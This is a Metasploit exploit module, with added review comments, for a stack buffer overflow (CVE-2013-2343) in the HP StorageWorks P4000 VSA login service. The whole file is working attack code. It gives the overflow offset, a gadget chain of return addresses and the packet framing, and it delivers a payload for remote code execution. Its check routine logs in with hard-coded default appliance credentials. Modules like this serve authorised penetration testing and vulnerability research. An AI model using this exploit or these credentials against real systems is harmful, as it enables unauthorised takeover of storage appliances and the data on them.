##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
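class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata for CVE-2013-2343 (ZDI-13-179): a stack buffer overflow in
  # the HP StorageWorks P4000 VSA management service ("hydra"), reached through
  # the slash-delimited login request on TCP/13838. A single target is defined
  # (VSA 9.0.0, x86 Linux); every address is a fixed offset into the hydra
  # binary, so the module assumes a non-PIE binary at its usual base and is
  # strictly version specific.
  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in HP's StorageWorks
          P4000 VSA on versions prior to 10.0. The vulnerability is due to an insecure usage
          of the sscanf() function when parsing login requests. This module has been tested
          successfully on the HP VSA 9 Virtual Appliance.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2013-2343'],
          ['OSVDB', '94701'],
          ['ZDI', '13-179'],
          ['URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c03661318']
        ],
      'Payload'        =>
        {
          # '/' (0x2f) separates the fields of the login string and NUL ends
          # the C string that sscanf() parses; CR/LF are excluded as line
          # terminators. Any of them inside the payload would cut the request
          # short before the overflow is complete.
          'BadChars'       => "\x2f\x00\x0d\x0a",
          'Space'          => 780,
          'DisableNops'    => true,
          # add esp, -3500: stack adjustment executed before the decoder so
          # that later pushes happen well below the encoded payload, which
          # itself lives on the stack right where esp pointed at entry.
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => ['linux'],
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          [ 'HP VSA 9',
            {
              # Version string sent by check() so a vulnerable appliance
              # accepts the login; exploit() deliberately sends a bogus one.
              'Version'    => '9.0.0',
              # Filler bytes before the saved return address is reached.
              'Offset'     => 3446,
              # Gadget chain (all addresses taken from the hydra binary):
              #   Ret        pop ebp ; ret  -> pops FakeObject into ebp, then
              #                                returns into JmpEsp
              #   FakeObject pointer into hydra's data section so that the
              #                                code still running before the
              #                                final ret (LHNSessionManager::
              #                                SendMessage) sees a valid object
              #   JmpEsp     push esp ; ret -> lands on payload.encoded, which
              #                                directly follows it on the stack
              'Ret'        => 0x0804EB34, # pop ebp # ret # from hydra
              'FakeObject' => 0x08072E58, # from hydra data
              'JmpEsp'     => 0x08050CB8  # push esp # ret # from hydra
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2013-06-28',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('RPORT', [true, 'The remote port', 13838])
      ])
  end

  # Probe the service by performing a real login as the built-in agent
  # account and classify the host from the reply:
  #   "OK" and "Login" present         -> Appears  (login accepted for the
  #                                                 target's version string)
  #   "FAILED" and "version" present   -> Detected (service answered, but the
  #                                                 version does not match)
  #   anything else, or no reply       -> Safe
  #
  # NOTE(review): this is not a passive fingerprint - it authenticates with
  # the hard-coded global$agent / L0CAlu53R credentials and will appear in the
  # appliance's logs as a login attempt. The socket is released in an ensure
  # block so a failed write/read cannot leak the connection.
  def check
    login = "login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\""
    res = nil

    connect
    begin
      vprint_status("#{rhost}:#{rport} Sending login packet to check...")
      sock.put(generate_packet(login))
      res = sock.get_once
    ensure
      disconnect
    end

    # get_once returns nil on timeout/EOF. Plain substring tests are used
    # instead of regexes so a reply with non-UTF-8 bytes cannot raise
    # ArgumentError from the matcher.
    return Exploit::CheckCode::Safe unless res

    if res.include?('OK') && res.include?('Login')
      Exploit::CheckCode::Appears
    elsif res.include?('FAILED') && res.include?('version')
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end

  # Wrap +data+ in the hydra login request framing. The fixed bytes are the
  # ones the original module sent; only the length field varies:
  #   8 bytes  00 00 00 00 00 00 00 01   fixed header
  #   4 bytes  big-endian length of data plus its NUL terminator
  #   4 bytes  00 00 00 00
  #   8 bytes  00 00 00 00 00 00 00 00
  #   8 bytes  00 00 00 14 ff ff ff ff
  #   n bytes  data, followed by a single NUL
  # The length is a byte count (bytesize), not a character count, and the
  # whole packet is built as a binary string so that mixing ASCII literals
  # with the raw overflow bytes can never raise Encoding::CompatibilityError.
  #
  # @param data [String] login string to frame (may contain raw bytes)
  # @return [String] the complete, binary-encoded request
  def generate_packet(data)
    body = data.dup.force_encoding(Encoding::BINARY) << "\x00"

    pkt = [0, 1].pack("N2")                # "\x00\x00\x00\x00\x00\x00\x00\x01"
    pkt << [body.bytesize].pack("N")       # length of data + NUL, big-endian
    pkt << [0].pack("N")                   # "\x00\x00\x00\x00"
    pkt << [0, 0].pack("N2")               # eight zero bytes
    pkt << [0x14, 0xffffffff].pack("N2")   # "\x00\x00\x00\x14\xff\xff\xff\xff"
    pkt << body
  end

  # Build the overflowing login request and send it. Stack layout produced:
  #   filler(Offset) | Ret | FakeObject | JmpEsp | payload.encoded
  # The vulnerable function returns into Ret (pop ebp ; ret): the pop consumes
  # FakeObject and the ret transfers to JmpEsp (push esp ; ret), whose ret
  # lands on the first byte of the encoded payload.
  #
  # NOTE(review): the filler comes from the Msf::Exploit rand_text wrapper,
  # which is expected to exclude the payload BadChars. If it did not, a stray
  # '/' or NUL in the filler would end the login string before the saved
  # return address is reached - confirm against the framework version in use.
  def exploit
    overflow = rand_text(target['Offset'])
    overflow << [target.ret].pack("V")
    overflow << [target['FakeObject']].pack("V") # Pointer to Fake Object in order to survive LHNSessionManager::SendMessage before ret
    overflow << [target['JmpEsp']].pack("V")
    overflow << payload.encoded

    # A bogus version makes the service abandon login handling as early as
    # possible, so the corrupted return address is used sooner.
    login = "login:/#global$agent/#{overflow}/#{rand_text_alpha(5)}/Version \"1\" "

    connect
    begin
      print_status("#{rhost}:#{rport} Sending login packet")
      sock.put(generate_packet(login))
    ensure
      # Fire-and-forget: nothing useful comes back on this socket, and the
      # payload handler runs independently. Always close, even on error.
      disconnect
    end
  end
end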